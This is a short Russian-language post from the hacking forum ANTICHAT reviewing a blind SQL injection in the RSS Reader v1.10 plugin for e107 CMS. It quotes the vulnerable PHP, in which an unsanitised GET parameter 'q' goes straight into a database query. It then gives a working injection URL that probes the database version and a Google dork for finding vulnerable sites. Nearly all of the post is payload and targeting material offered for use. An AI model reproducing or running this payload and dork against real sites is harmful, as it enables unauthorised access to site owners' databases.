ANTICHAT - Показать сообщение отдельно - [ Обзор уязвимостей e107 cms ]

RSS Reader v1.10

Blind SQL Injection:

/include/getrss.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...

[/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"q"[/COLOR][COLOR="#007700"]];

...

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]DB_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"rss_reader"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"rss_feed_addr"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"rss_feed_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"]);

...[/COLOR][/COLOR]

Пример:

Код:

http://e107/e107_plugins/rss_reader/include/getrss.php?q=2%20and%20substring(version(),1,1)=5

Путь:

http://e107/e107_plugins/rss_reader/admin_menu.php

Дорк:inurl:e107_plugins/rss_reader/